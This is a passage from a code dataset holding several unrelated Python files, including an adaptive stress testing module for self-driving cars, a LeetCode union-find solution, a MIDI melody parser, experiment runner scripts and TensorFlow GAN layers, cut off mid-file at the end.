self.top_paths.N):\n tabular.record('reward ' + str(topi_left), 0)\n logger.log(tabular)\n logger.dump_all(self.step_count)\n tabular.clear()\n\n def isterminal(self):\n \"\"\"Check whether the current path is finished.\n\n Returns\n ----------\n isterinal : bool\n Whether the current path is finished.\n \"\"\"\n return self._isterminal\n\n def get_reward(self):\n \"\"\"Get the current AST reward.\n\n Returns\n ----------\n reward : bool\n The AST reward.\n \"\"\"\n return self._reward\n\n def random_action(self):\n \"\"\"Randomly sample an action for the rollout.\n\n Returns\n ----------\n action : :py:class:`ast_toolbox.mcts.AdaptiveStressTesting.ASTAction`\n The sampled action.\n \"\"\"\n return ASTAction(self.env.action_space.sample())\n\n def explore_action(self, s, tree):\n \"\"\"Randomly sample an action for the exploration.\n\n Parameters\n ----------\n s : :py:class:`ast_toolbox.mcts.AdaptiveStressTesting.ASTState`\n The current state.\n tree : dict\n The searching tree.\n\n Returns\n ----------\n action : :py:class:`ast_toolbox.mcts.AdaptiveStressTesting.ASTAction`\n The sampled action.\n \"\"\"\n return ASTAction(self.env.action_space.sample())\n\n def transition_model(self):\n \"\"\"Generate the transition model used in MCTS.\n\n Returns\n ----------\n transition_model : :py:class:`ast_toolbox.mcts.MDP.TransitionModel`\n The transition model.\n \"\"\"\n def 
get_initial_state():\n \n self.t_index = 1\n self.initialize()\n s = ASTState(self.t_index, None, None)\n self.sim_hash = s.hash\n return s\n\n def get_next_state(s0, a0):\n assert self.sim_hash == s0.hash\n self.t_index += 1\n self.update(a0)\n s1 = ASTState(self.t_index, s0, a0)\n self.sim_hash = s1.hash\n r = self.get_reward()\n return s1, r\n\n def isterminal(s):\n assert self.sim_hash == s.hash\n return self.isterminal()\n\n def go_to_state(target_state):\n s = get_initial_state()\n actions = get_action_sequence(target_state)\n # print(\"go to state with actions: \",actions)\n R = 0.0\n for a in actions:\n s, r = get_next_state(s, a)\n R += r\n assert s == target_state\n return R, actions\n return MDP.TransitionModel(get_initial_state, get_next_state, isterminal, self.params.max_steps, go_to_state)\n\n\nclass ASTState:\n \"\"\"The AST state.\n\n Parameters\n ----------\n t_index : int\n The index of the timestep.\n parent : :py:class:`ast_toolbox.mcts.AdaptiveStressTesting.ASTState`\n The parent state.\n action : :py:class:`ast_toolbox.mcts.AdaptiveStressTesting.ASTAction`\n The action leading to this state.\n \"\"\"\n\n def __init__(self, t_index, parent, action):\n self.t_index = t_index\n self.parent = parent\n self.action = action\n self.hash = hash(self)\n\n def __hash__(self):\n \"\"\"The redefined hashing method.\n\n Returns\n ----------\n hash : int\n The hashing result.\n \"\"\"\n if self.parent is None:\n return hash((self.t_index, None, hash(self.action)))\n else:\n return hash((self.t_index, self.parent.hash, hash(self.action)))\n\n def __eq__(self, other):\n \"\"\"The redefined equal method.\n\n Returns\n ----------\n is_equal : bool\n Whether the two states are equal.\n \"\"\"\n return hash(self) == hash(other)\n\n\nclass ASTAction:\n def __init__(self, action):\n \"\"\"The AST action.\n\n Parameters\n ----------\n action :\n The true actions used in the env.\n \"\"\"\n self.action = action\n\n def __hash__(self):\n \"\"\"The redefined hashing method.\n\n Returns\n ----------\n hash : int\n The hashing result.\n \"\"\"\n return hash(tuple(self.action))\n\n def __eq__(self, other):\n \"\"\"The redefined equal method.\n\n Returns\n ----------\n is_equal : bool\n Whether the two states are equal.\n \"\"\"\n return np.array_equal(self.action, other.action)\n\n def get(self):\n \"\"\"Get the true action.\n\n Returns\n ----------\n action :\n The true actions used in the env.\n \"\"\"\n return self.action\n\n\ndef get_action_sequence(s):\n \"\"\"Get the action sequence that leads to the state.\n\n Parameters\n ----------\n s : :py:class:`ast_toolbox.mcts.AdaptiveStressTesting.ASTState`\n The target state.\n\n Returns\n ----------\n actions : list[:py:class:`ast_toolbox.mcts.AdaptiveStressTesting.ASTAction`]\n The action sequences leading to the target state.\n \"\"\"\n actions = []\n while s.parent is not None:\n actions.append(s.action)\n s = s.parent\n actions = list(reversed(actions))\n return actions\n","repo_name":"mushi333/2021-FIT4003-SBSE-for-self-driving-cars","sub_path":"ast_toolbox/mcts/AdaptiveStressTesting.py","file_name":"AdaptiveStressTesting.py","file_ext":"py","file_size_in_byte":10476,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"71335765800","text":"# 2421. 
Number of Good Paths\n# Union Find\n\n# https://leetcode.com/problems/number-of-good-paths/solutions/2620529/python-explanation-with-picture-dsu/?orderBy=most_votes\nclass UnionFind:\n def __init__(self, n):\n self.root = list(range(n))\n self.rank = [1 for i in range(n)]\n \n def find(self, p):\n while p != self.root[p]:\n self.root[p] = self.root[self.root[p]]\n p = self.root[p]\n return p \n\n\nclass Solution:\n def numberOfGoodPaths(self, vals: List[int], edges: List[List[int]]) -> int:\n res = n = len(vals)\n uf = UnionFind(n)\n\n graph = collections.defaultdict(list)\n for a,b in edges:\n graph[a].append(b)\n graph[b].append(a)\n \n count = collections.defaultdict(dict)\n for i, v in enumerate(vals):\n count[i][v] = 1\n \n for v, cur in sorted([v, i] for i,v in enumerate(vals)):\n for nxt in graph[cur]:\n root_nxt,root_cur = uf.find(nxt), uf.find(cur)\n if vals[nxt] <= v and root_cur != root_nxt:\n uf.root[root_cur] = root_nxt\n res += count[root_cur][v] * count[root_nxt].get(v, 0)\n count[root_nxt][v] = count[root_nxt].get(v, 0) + count[root_cur][v]\n\n \n return res\n\n\n","repo_name":"junyang10734/leetcode-python","sub_path":"2421.py","file_name":"2421.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"1942231554","text":"with open('lyrics.txt', encoding=\"utf8\") as f:\r\n lyrics = f.read()\r\n\r\nlyrics_list = []\r\nbanned = [' ', '.' , ',' , '!']\r\nlyrics_word = ''\r\n\r\nfor w in lyrics:\r\n w = w.lower()\r\n if w == '\\n':\r\n if lyrics_word:\r\n lyrics_list.append(lyrics_word)\r\n lyrics_word = ''\r\n elif w not in banned:\r\n lyrics_word += w\r\n else:\r\n if lyrics_word:\r\n lyrics_list.append(lyrics_word)\r\n lyrics_word = ''\r\nif lyrics_word:\r\n lyrics_list.append(lyrics_word)\r\n lyrics_word = ''\r\n\r\ncheck_dupes = {}\r\n\r\nfor w in lyrics_list:\r\n w = w.lower()\r\n if w not in check_dupes:\r\n check_dupes[w] = 1\r\n else:\r\n check_dupes[w] += 1\r\n\r\nmost_freq_word = max(check_dupes.values())\r\n\r\nfor k in check_dupes.keys():\r\n if check_dupes[k] == most_freq_word:\r\n most_freq_word = k , check_dupes[k]\r\n\r\ndef most_common_words(most_freq_word):\r\n values = most_freq_word.values()\r\n best = max(values)\r\n words = []\r\n for k in most_freq_word:\r\n if most_freq_word[k] == best:\r\n words.append(k)\r\n return words , best \r\n\r\n\r\ndef words_often(check_dupes , times):\r\n words = []\r\n word1 = []\r\n for i in check_dupes:\r\n if check_dupes[i] >= times:\r\n word1 = i , check_dupes[i]\r\n words.append(word1)\r\n return words \r\n\r\nresalt = words_often(check_dupes , 7 ) \r\nprint(resalt)","repo_name":"Akimov232/big_work","sub_path":"programm_word.py","file_name":"programm_word.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"7292165426","text":"'''This module defines the integer-matrix subroutines used in\n quarc.\n'''\nfrom core import *\nfrom sklearn.linear_model import LogisticRegression, LinearRegression\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.metrics import classification_report\nfrom sklearn.neural_network import MLPRegressor\nfrom sklearn.preprocessing import PolynomialFeatures\nimport numpy as np\n\n\nclass LinearAutoregressiveIM():\n\n\tdef __init__(self):\n\t\tpass\n\n\tdef avg_run_size(self, vector):\n\n\t\tN = vector.shape[0]\n\n\t\truns = []\n\t\tstart = 0\n\t\tfor i in range(N-1):\n\t\t\tif vector[i] 
!= vector[i+1]:\n\t\t\t\truns.append(i+1 - start)\n\t\t\t\tstart = i + 1\n\n\t\treturn np.mean(runs)\n\n\n\tdef compress(self, src):\n\t\tdata = src.copy()\n\t\tN,p = data.shape\n\t\tcoderange = np.max(src)\n\n\t\tmodels = []\n\t\tclasses = []\n\n\t\tlag = 1\n\t\t\n\t\tfor j in range(0, p):\n\n\t\t\ttraining_X = []\n\t\t\ttraining_Y = []\n\n\t\t\tfor i in range(lag, N):\n\t\t\t\ttraining_X.append(src[i-lag:i,:].flatten())\n\t\t\t\ttraining_Y.append(src[i,j])\n\n\t\t\tX = np.array(training_X)\n\t\t\tY = np.array(training_Y)\n\n\t\t\tp = PolynomialFeatures(degree = 2)\n\t\t\tX = p.fit_transform(X)\n\n\t\t\treg = LinearRegression()\n\t\t\treg.fit(X,Y)\n\n\t\t\tY_pred = np.round(reg.predict(X))\n\n\t\t\tcnt = 0\n\t\t\tfor i in range(lag, N-1):\n\t\t\t\tif int(Y_pred[i-lag]) == int(Y[i-lag]):\n\t\t\t\t\tdata[i,j] = coderange + 1\n\t\t\t\t\tcnt += 1\n\n\t\t\t\t\t#print(int(Y_pred[i-lag]),int(Y[i-lag]))\n\n\t\t\tprint('Replaced', cnt, N, 'for attr',j, self.avg_run_size(src[:,j]),self.avg_run_size(data[:,j]))\n\t\t\t#models.append(reg.coef_)\n\t\t\tbreak\n\n\n\n\t\treturn data, models, classes\n\n\n\tdef decompress(self, src, models, classes):\n\n\t\tcoderange = np.max(src)\n\t\tN,p = src.shape\n\n\t\t#left to right decoding\n\t\tfor (j,(m,c)) in enumerate(zip(models, classes)):\n\t\t\tif not m is None:\n\t\t\t\tslice = list(range(0,j))\n\t\t\t\tX = src[:,slice]\n\n\t\t\t\treg = LogisticRegression()\n\t\t\t\treg.intercept_ = m[:,0]\n\t\t\t\treg.coef_ = m[:,1:]\n\t\t\t\t#print(c, m.shape, c.shape)\n\t\t\t\treg.classes_ = c\n\n\t\t\t\tYpred = reg.predict(X)\n\n\t\t\t\t#Ypred = np.array([classes[Ypred[i]] for i in range(N)])#assign actual class values\n\n\t\t\t\tmask = (src[:,j] == coderange)\n\t\t\t\tsrc[mask,j] = Ypred[mask]#impute\n\n\t\treturn src, np.max(src)\n\n\n\n\nclass LinearAutoregressiveIM2():\n\n\tdef __init__(self):\n\t\tpass\n\n\n\tdef compress(self, src):\n\t\tdata = src.copy()\n\t\tN,p = data.shape\n\t\tcoderange = int(np.max(src))\n\t\tmodels = []\n\t\tclasses = []\n\t\t\n\t\tdata = data.flatten()\n\n\t\tnew_data = np.zeros((N*p, coderange))\n\n\t\t#for each possible code\n\t\tfor i in range(coderange):\n\t\t\tnew_data[data == i, i] = 1\n\t\t\t\n\t\t#\tnew_data[:,i] = data[]\n\n\t\treturn new_data, models, classes\n\n\n\tdef decompress(self, src, models, classes):\n\n\t\tcoderange = np.max(src)\n\t\tN,p = src.shape\n\n\t\t#left to right decoding\n\t\tfor (j,(m,c)) in enumerate(zip(models, classes)):\n\t\t\tif not m is None:\n\t\t\t\tslice = list(range(0,j))\n\t\t\t\tX = src[:,slice]\n\n\t\t\t\treg = LogisticRegression()\n\t\t\t\treg.intercept_ = m[:,0]\n\t\t\t\treg.coef_ = m[:,1:]\n\t\t\t\t#print(c, m.shape, c.shape)\n\t\t\t\treg.classes_ = c\n\n\t\t\t\tYpred = reg.predict(X)\n\n\t\t\t\t#Ypred = np.array([classes[Ypred[i]] for i in range(N)])#assign actual class values\n\n\t\t\t\tmask = (src[:,j] == coderange)\n\t\t\t\tsrc[mask,j] = Ypred[mask]#impute\n\n\t\treturn src, np.max(src)","repo_name":"sjyk/learning-to-compress","sub_path":"l2c/imcompress.py","file_name":"imcompress.py","file_ext":"py","file_size_in_byte":3127,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"16093366601","text":"from __future__ import annotations\nfrom dataclasses import dataclass\nfrom functools import cached_property\nfrom pathlib import Path\nfrom collections import Counter\nimport math\nfrom typing import TYPE_CHECKING, Iterable\n\nfrom mido import MidiFile, Message\n\nif TYPE_CHECKING:\n from argparse import _ArgumentGroup, Namespace\n from 
._music_box import MusicBox\n\n\n@dataclass\nclass Sound:\n note: int\n time: int\n track: int\n\n\n@dataclass(frozen=True)\nclass Transposition:\n shift: int\n ratio: float\n\n\n@dataclass\nclass Distance:\n time: int\n diff: float = math.inf\n\n\n@dataclass\nclass Melody:\n path: Path\n music_box: MusicBox\n transpose_lower: int = -100\n transpose_upper: int = 100\n max_pause: int = 2000\n start_pause: int = 200\n cut_pause: int = 50_000\n transpose: bool = True\n tracks: frozenset = frozenset(range(40))\n\n @classmethod\n def init_parser(cls, parser: _ArgumentGroup) -> None:\n parser.add_argument(\n '--input', type=Path, required=True,\n help='path to the input MIDI (*.mid) file',\n )\n parser.add_argument(\n '--transpose-lower', type=int, default=cls.transpose_lower,\n help='the lowest transposition to try',\n )\n parser.add_argument(\n '--transpose-upper', type=int, default=cls.transpose_upper,\n help='the highest transposition to try',\n )\n parser.add_argument(\n '--no-transpose', action='store_true',\n help='do only octave transposition (in steps of 12 notes)',\n )\n parser.add_argument(\n '--tracks', nargs='*', type=int, default=[],\n help='numbers of sound tracks to include',\n )\n parser.add_argument(\n '--max-pause', type=int, default=cls.max_pause,\n help='maximum pause (in ticks) between two consequentive sounds',\n )\n parser.add_argument(\n '--start-pause', type=int, default=cls.start_pause,\n help='pause (in ticks) at the beginning of the first stripe',\n )\n parser.add_argument(\n '--cut-pause', type=int, default=cls.cut_pause,\n help='cut the song if pause is longer than this value (in ticks)',\n )\n\n @classmethod\n def from_args(cls, args: Namespace, *, music_box: MusicBox) -> Melody:\n return cls(\n path=args.input,\n transpose_lower=args.transpose_lower,\n transpose_upper=args.transpose_upper,\n max_pause=args.max_pause,\n start_pause=args.start_pause,\n cut_pause=args.cut_pause,\n transpose=not args.no_transpose,\n tracks=frozenset(args.tracks) or cls.tracks,\n music_box=music_box,\n )\n\n @cached_property\n def sounds(self) -> list[Sound]:\n sounds: list[Sound] = []\n with MidiFile(str(self.path)) as midi_file:\n message: Message\n for i, track in enumerate(midi_file.tracks):\n if i not in self.tracks:\n continue\n time = 0\n prev_time = 0\n sounds_before = len(sounds)\n for message in track:\n time += message.time\n if message.is_meta:\n continue\n if message.type != \"note_on\":\n continue\n if message.velocity == 0:\n continue\n # if the pause too long, make it shorter\n diff = time - prev_time\n if sounds and diff > self.cut_pause:\n break\n time = prev_time + min(self.max_pause, diff)\n prev_time = time\n sound = Sound(note=message.note, time=time, track=i)\n sounds.append(sound)\n name = f'#{i} \"{track.name.strip()}\"'\n print(f' included {len(sounds) - sounds_before} sounds from track {name}')\n\n # set fixed silence at the beginning\n if sounds:\n shift = self.start_pause - min(sound.time for sound in sounds)\n for sound in sounds:\n sound.time += shift\n\n sounds.sort(key=lambda sound: sound.time)\n return sounds\n\n @cached_property\n def notes_use(self) -> dict[int, int]:\n \"\"\"How many times each note appears in the melody.\n \"\"\"\n return dict(Counter(sounds.note for sounds in self.sounds))\n\n @cached_property\n def sounds_count(self) -> int:\n \"\"\"How many sounds in total there are in the melody.\n \"\"\"\n return len(self.sounds)\n\n def count_available_sounds(self, trans: int) -> int:\n \"\"\"How many notes from the melody fit in the music 
box.\n \"\"\"\n count = 0\n for note, freq in self.notes_use.items():\n if self.music_box.contains_note(note + trans):\n count += freq\n return count\n\n @cached_property\n def max_time(self) -> int:\n \"\"\"The tick when the last note plays.\n \"\"\"\n if not self.sounds:\n return 0\n return max(sounds.time for sounds in self.sounds)\n\n @cached_property\n def best_transpose(self) -> Transposition:\n \"\"\"Transposition that fits most of the notes.\n \"\"\"\n lower_octave = int(self.transpose_lower / 12) * 12\n best_transpose = self._get_best_transpose(\n range(lower_octave, self.transpose_upper, 12),\n )\n # Better to transpose with preserving most of the notes.\n # If full octave transposition doesn't fit just a bit, roll with it.\n if best_transpose.ratio >= .90:\n return best_transpose\n if not self.transpose:\n return best_transpose\n return self._get_best_transpose(\n range(self.transpose_lower, self.transpose_upper),\n )\n\n def _get_best_transpose(self, seq: Iterable[int]) -> Transposition:\n \"\"\"Try all transpositions from the sequence and pick the best one.\n \"\"\"\n if not self.sounds:\n return Transposition(0, 1)\n best_transpose: Transposition = Transposition(0, 0)\n for shift in seq:\n avail = self.count_available_sounds(shift)\n ratio = avail / float(self.sounds_count)\n if ratio == 1:\n return Transposition(shift, 1)\n if ratio > best_transpose.ratio:\n best_transpose = Transposition(shift, ratio)\n return best_transpose\n\n @cached_property\n def min_distance(self) -> float:\n \"\"\"The shortest time between 2 consequentive sounds (in ticks).\n \"\"\"\n min_distances: dict[int, Distance] = {}\n for sound in self.sounds:\n distance = min_distances.setdefault(sound.note, Distance(sound.time))\n diff = sound.time - distance.time\n if math.isclose(diff, 0):\n continue\n distance.diff = min(distance.diff, diff)\n distance.time = sound.time\n if not min_distances:\n return math.inf\n return min(d.diff for d in min_distances.values())\n","repo_name":"orsinium-labs/punchline","sub_path":"punchline/_melody.py","file_name":"_melody.py","file_ext":"py","file_size_in_byte":7169,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"18"} +{"seq_id":"33796891272","text":"from __future__ import annotations\n\nfrom typing import TYPE_CHECKING\n\nfrom domify import html_elements as e\n\nfrom cerbottana import custom_elements as ce\nfrom cerbottana.html_utils import BaseHTMLCommand\nfrom cerbottana.plugins import command_wrapper\n\nif TYPE_CHECKING:\n from cerbottana.models.message import Message\n\n\nclass ColorCompareHTML(BaseHTMLCommand):\n _STYLES = { # noqa: RUF012\n \"table\": {\n \"table-layout\": \"fixed\",\n \"width\": \"100%\",\n },\n \"background1\": {\n \"box-shadow\": \"inset 0 0 0 100vh, 0 30px\",\n \"height\": \"30px\",\n },\n \"username\": {\n \"font-weight\": \"bold\",\n \"text-align\": \"center\",\n },\n \"background2\": {\n \"box-shadow\": \"inset 0 0 0 100vh, 0 -30px\",\n \"height\": \"30px\",\n },\n }\n\n def __init__(self, *, usernames: list[str]) -> None:\n super().__init__()\n\n with self.doc, e.Table(style=self._get_css(\"table\")), e.Tr():\n for username in usernames:\n with e.Td():\n with ce.Username(name=username):\n e.Div(style=self._get_css(\"background1\"))\n\n e.Div(username, style=self._get_css(\"username\"))\n\n with ce.Username(name=username):\n e.Div(style=self._get_css(\"background2\"))\n\n\n@command_wrapper(\n aliases=(\"cc\",),\n helpstr=\"nick1, nick2, ... 
Visualizza i colori dei nickname elencati.\",\n required_rank_editable=True,\n)\nasync def colorcompare(msg: Message) -> None:\n # Ignore empty args: they're usually typos, i.e. \"a,,b\".\n args = [arg for arg in msg.args if arg]\n if not args:\n return\n\n html = ColorCompareHTML(usernames=args)\n await msg.reply_htmlbox(html.doc)\n","repo_name":"Parnassius/cerbottana","sub_path":"cerbottana/plugins/colorcompare.py","file_name":"colorcompare.py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"20694754004","text":"import os,subprocess\n\nlog_dir='/home/kharesp/log'\npayload_sizes=[4000]\n#sleep_intervals=[5,10,20,40,80]\n#data_rates=[200,100,50,25,12]\nsleep_intervals=[80]\ndata_rates=[12]\npub_sample_count=10000\nsubscriber_step_size=4\nnumber_of_steps=8\n\ndef create_directory(path):\n if not os.path.exists(path):\n os.makedirs(path)\n\nfor i in range(len(data_rates)):\n #create directory for rate\n rate_dir_path='%s/rate_%d'%(log_dir,data_rates[i])\n create_directory(rate_dir_path)\n\n for idx,payload in enumerate(payload_sizes):\n create_directory('%s/%d'%(rate_dir_path,payload))\n \n print('python src/tests/subscriber_stress_test.py --setup %d %d %d\\\n 1 %s %s %s'%(subscriber_step_size,subscriber_step_size,\\\n number_of_steps*subscriber_step_size,\\\n str(sleep_intervals[i]),str(payload),str(pub_sample_count)))\n\n subprocess.check_call(['python','src/tests/subscriber_stress_test.py','--setup',\n '%d'%(subscriber_step_size),\n '%d'%(subscriber_step_size),\n '%d'%(number_of_steps*subscriber_step_size),\n '1',\n str(sleep_intervals[i]),\n str(payload),\n str(pub_sample_count)])\n\n sub_dirs=range(subscriber_step_size,\n subscriber_step_size*(number_of_steps+1),\n subscriber_step_size)\n\n command_string=['python','src/plots/summarize/summarize.py',\n '-log_dir',log_dir,'-sub_dirs']\n for sub_dir in sub_dirs:\n command_string.append(str(sub_dir))\n subprocess.check_call(command_string)\n\n command_string=['python','src/plots/summarize/collate.py',\n '-xlabel','subscribers','-log_dir',log_dir,'-sub_dirs']\n for sub_dir in sub_dirs:\n command_string.append(str(sub_dir))\n subprocess.check_call(command_string)\n\n command_string='mv /home/kharesp/log/*.csv %s/%d'%(rate_dir_path,payload)\n subprocess.check_call(['bash','-c',command_string])\n\n command_string='mv /home/kharesp/log/*.pdf %s/%d'%(rate_dir_path,payload)\n subprocess.check_call(['bash','-c',command_string])\n\n for sub_dir in sub_dirs:\n command_string='mv /home/kharesp/log/%d %s/%d'%(sub_dir,rate_dir_path,payload)\n subprocess.check_call(['bash','-c',command_string])\n","repo_name":"doc-vu/edgent","sub_path":"scripts/experiment/src/tests/baseline/subscriber_scalability_test.py","file_name":"subscriber_scalability_test.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"14338146980","text":"import os\nimport numpy as np\nfrom scipy.interpolate import interp1d\nimport matplotlib.pyplot as plt\nimport utils\n\ncurrent_file = os.path.abspath(__file__)\nfolder_pa = os.path.dirname(current_file)\nfolder_path = f\"{folder_pa}/\"\n# output_path = None\noutput_path = folder_path\n\nxold = np.linspace(0, 10, num=11, endpoint=True)\n# y = np.cos(-x**2/9.0)\nXO, y_true = utils.gen_obsdata()\ninstants = np.unique(XO[:, 4:5])\ntot = np.hstack((XO, y_true))\nXO_all = tot[tot[:, 0]==np.max(tot[:, 0])]\n\ny = XO_all[:, 
5:].reshape(len(instants),)\n\nf = interp1d(instants, y)\nf2 = interp1d(instants, y, kind='cubic')\n\n\"DEVO INTERPOLARE ANCHE X, TEND, TSUP, FL PER L'OSSERVATORE!!!!\"\n\nxnew = np.linspace(0, 0.1, num=41, endpoint=True)\n\nplt.plot(instants, y, 'o', xnew, f(xnew), '-', xnew, f2(xnew), '--')\nplt.legend(['data', 'linear', 'cubic'], loc='best')\nplt.savefig(f\"{folder_path}figures/prova_interp_new.png\", dpi=300, bbox_inches='tight')\nplt.show()\n\n\n\n","repo_name":"gcappellini/pinns_bioheat","sub_path":"experiment/observer/interpol.py","file_name":"interpol.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"18233834573","text":"import numpy as np\nimport tensorflow as tf\n\nfrom config import cfg\n\nfrom operations_nodes import (\n eq_lr_init_w,\n const_init_w,\n pixel_norm,\n instance_norm,\n DTYPE,\n FORMAT,\n)\n\n\ndef dense(\n fan_in: int,\n fan_out: int,\n add_bias: bool = True,\n storage: list = None,\n block_name: str = \"\",\n):\n w, w_scale = eq_lr_init_w(\n shape=[fan_in, fan_out], name=f\"w_dense_{block_name}\", storage=storage\n )\n if add_bias:\n b = const_init_w(shape=[fan_out], name=f\"b_dense_{block_name}\", storage=storage)\n\n def process(x: tf.Tensor) -> tf.Tensor:\n return tf.add(tf.matmul(x, w*w_scale), b)\n\n return process\n\n def process(x: tf.Tensor) -> tf.Tensor:\n return tf.matmul(x, w*w_scale)\n\n return process\n\n\ndef conv2d(\n fan_in: int,\n f_maps: int,\n kernel_hw_dims: tuple,\n add_bias: bool = True,\n storage: list = None,\n block_name: str = \"\",\n):\n assert len(kernel_hw_dims) == 2\n w, w_scale = eq_lr_init_w(\n shape=[kernel_hw_dims[0], kernel_hw_dims[1], fan_in, f_maps],\n name=f\"w_conv_{block_name}\",\n storage=storage,\n )\n if add_bias:\n b = const_init_w(\n shape=[1, 1, 1, f_maps], name=f\"b_conv_{block_name}\", storage=storage\n )\n\n def process(x: tf.Tensor) -> tf.Tensor:\n return tf.add(\n tf.nn.conv2d(\n x, w*w_scale, strides=[1, 1, 1, 1], padding=\"SAME\", data_format=FORMAT\n ),\n b,\n )\n\n return process\n\n def process(x: tf.Tensor) -> tf.Tensor:\n return tf.nn.conv2d(\n x, w*w_scale, strides=[1, 1, 1, 1], padding=\"SAME\", data_format=FORMAT\n )\n\n return process\n\n\ndef resize2d(x: tf.Tensor, scale: float = 2.0) -> tf.Tensor:\n assert scale > 0\n if scale == 1:\n return x\n\n elif scale > 1:\n # Nearest Neighbour upsampling\n scale = int(scale)\n x_shape = tf.shape(x)\n # Given that data_raw is NHWC, add dimensions after resize channels (H and W)\n x = tf.reshape(x, [-1, x_shape[1], 1, x_shape[2], 1, x_shape[3]])\n # Tile added dimensions by a scale factor to replicate H and W dims\n x = tf.tile(x, [1, 1, scale, 1, scale, 1])\n # Reshape back to original dims with H and W scaled\n x = tf.reshape(x, [-1, x_shape[1] * scale, x_shape[2] * scale, x_shape[3]])\n return x\n\n elif 0 < scale < 1:\n # Average pooling\n scale = int(1 / scale)\n return tf.nn.avg_pool(\n x,\n ksize=[1, scale, scale, 1],\n strides=[1, scale, scale, 1],\n padding=\"VALID\",\n data_format=FORMAT,\n )\n\n\ndef up_conv2d(\n fan_in: int,\n f_maps: int,\n kernel_hw_dims: tuple,\n add_bias: bool = True,\n storage: list = None,\n block_name: str = \"\",\n):\n\n assert len(kernel_hw_dims) == 2\n w, w_scale = eq_lr_init_w(\n shape=[kernel_hw_dims[0], kernel_hw_dims[1], fan_in, f_maps],\n name=f\"w_up_conv_{block_name}\",\n storage=None,\n )\n w_name = w.name\n w = tf.transpose(w, [0, 1, 3, 2])\n w = tf.pad(w, [[1, 1], [1, 1], [0, 0], [0, 0]], mode='CONSTANT')\n w 
= tf.add_n([w[1:, 1:], w[:-1, 1:], w[1:, :-1], w[:-1, :-1]])\n w = tf.Variable(w, trainable=True, name=w_name)\n\n if storage is not None:\n storage.append(w)\n\n if add_bias:\n b = const_init_w(\n shape=[1, 1, 1, f_maps], name=f\"b_conv_{block_name}\", storage=storage\n )\n\n def process(x: tf.Tensor) -> tf.Tensor:\n out_shape = [tf.shape(x)[0], x.shape[1] * 2, x.shape[2] * 2, f_maps]\n\n return tf.add(\n tf.nn.conv2d_transpose(\n x, w*w_scale, out_shape, strides=[1, 2, 2, 1], padding=\"SAME\", data_format=FORMAT\n ),\n b,\n )\n\n return process\n\n def process(x: tf.Tensor) -> tf.Tensor:\n out_shape = [tf.shape(x)[0], x.shape[1] * 2, x.shape[2] * 2, f_maps]\n\n return tf.nn.conv2d_transpose(\n x, w*w_scale, out_shape, strides=[1, 2, 2, 1], padding=\"SAME\", data_format=FORMAT\n )\n\n return process\n\n\ndef down_conv2d(\n fan_in: int,\n f_maps: int,\n kernel_hw_dims: tuple,\n add_bias: bool = True,\n storage: list = None,\n block_name: str = \"\",\n):\n\n assert len(kernel_hw_dims) == 2\n w, w_scale = eq_lr_init_w(\n shape=[kernel_hw_dims[0], kernel_hw_dims[1], fan_in, f_maps],\n name=f\"w_down_conv_{block_name}\",\n storage=None,\n )\n w_name = w.name\n w = tf.pad(w, [[1, 1], [1, 1], [0, 0], [0, 0]], mode='CONSTANT')\n w = tf.add_n([w[1:, 1:], w[:-1, 1:], w[1:, :-1], w[:-1, :-1]]) * 0.25\n w = tf.Variable(w, trainable=True, name=w_name)\n\n if storage is not None:\n storage.append(w)\n\n if add_bias:\n b = const_init_w(\n shape=[1, 1, 1, f_maps], name=f\"b_conv_{block_name}\", storage=storage\n )\n\n def process(x: tf.Tensor) -> tf.Tensor:\n\n return tf.add(\n tf.nn.conv2d(\n x, w*w_scale, strides=[1, 2, 2, 1], padding=\"SAME\", data_format=FORMAT\n ),\n b,\n )\n\n return process\n\n def process(x: tf.Tensor) -> tf.Tensor:\n return tf.nn.conv2d(\n x, w*w_scale, strides=[1, 2, 2, 1], padding=\"SAME\", data_format=FORMAT\n )\n\n return process\n\n\n# STD DEV LAYER TAKEN FROM STYLE GAN REPO =================================================\ndef std_dev_layer(x: tf.Tensor, group_size: int = 4):\n group_size = tf.minimum(group_size, tf.shape(x)[0])\n x_dim = tf.shape(x)\n # [GMHWnc] Split minibatch into M groups of size G\n y = tf.reshape(x, [group_size, -1, x_dim[1], x_dim[2], 1, x_dim[3]])\n # [GMHWnc] Subtract mean over group\n y -= tf.reduce_mean(y, axis=0, keepdims=True)\n # [MHWnc] Calc variance over group\n y = tf.reduce_mean(tf.square(y), axis=0)\n # [MHWnc] Calc stddev over group\n y = tf.sqrt(y + 1e-8)\n # [M11n1] Take average over fmaps and pixels\n y = tf.reduce_mean(y, axis=[1, 2, 4], keepdims=True)\n # [M11n]\n y = tf.reduce_mean(y, axis=[4])\n # [NHW1] Replicate over group and pixels\n y = tf.tile(y, [group_size, x_dim[1], x_dim[2], 1])\n return tf.concat([x, y], axis=3)\n# =========================================================================================\n\n\n# GAN'S BLOCKS ---\ndef to_img(\n fan_in: int, num_channels: int, block_name: str = \"to_img\", storage: list = None\n):\n conv2d_node = conv2d(\n fan_in=fan_in,\n f_maps=num_channels,\n kernel_hw_dims=(1, 1),\n add_bias=True,\n storage=storage,\n block_name=block_name,\n )\n\n def process(x: tf.Tensor) -> tf.Tensor:\n return conv2d_node(x)\n\n return process\n\n\ndef from_img(\n fan_out: int, num_channels: int, block_name: str = \"from_img\", storage: list = None\n):\n conv2d_node = conv2d(\n fan_in=num_channels,\n f_maps=fan_out,\n kernel_hw_dims=(1, 1),\n add_bias=True,\n storage=storage,\n block_name=block_name,\n )\n\n def process(x: tf.Tensor) -> tf.Tensor:\n return conv2d_node(x)\n\n return process\n\n\ndef 
